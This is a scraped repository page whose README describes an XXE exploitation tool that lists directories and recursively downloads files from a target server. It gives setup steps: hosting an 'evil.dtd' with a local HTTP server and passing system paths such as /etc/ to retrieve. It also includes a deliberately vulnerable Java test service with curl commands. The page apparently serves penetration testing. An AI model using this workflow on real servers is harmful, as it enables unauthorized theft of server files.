by AonCyberLabs

214 Stars 86 Forks Last release: Not found GNU General Public License v2.0 3 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:


This tool exploits XXE to retrieve files from a target server. It obtains directory listings and recursively downloads file contents.


The script has to be slightly modified to work with different web sites / web services: * Set

according to your target * Change the XML data and the URL of your evil.dtd in the
* Modify the
method to parse the file content from the response. * For https: Change the
method to use

Also, make sure you make the DTD

available to the server:
python -m SimpleHTTPServer 5678
python xxeclient.py -h
usage: xxeclient.py [-h] path [path ...]

Retrieves files via XXE

positional arguments: path path(s) to the retrieve (e.g. /etc/)

optional arguments: -h, --help show this help message and exit

Vulnerable Example Web Service

The files in

contain a sample vulnerable RESTful web service written in Java using Jersey (inspired by [1]).

To compile and run it using maven run:

mvn jetty:run


The JSON and XML files in

can be used to debug the web service with curl:
curl -v -H "Content-Type:application/json" --upload-file initial.json http://localhost:8080/api/user
curl -v -H "Content-Type:application/xml" --upload-file cdata.xml http://localhost:8080/api/user

[1] https://github.com/rgerganov/xxe-example

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.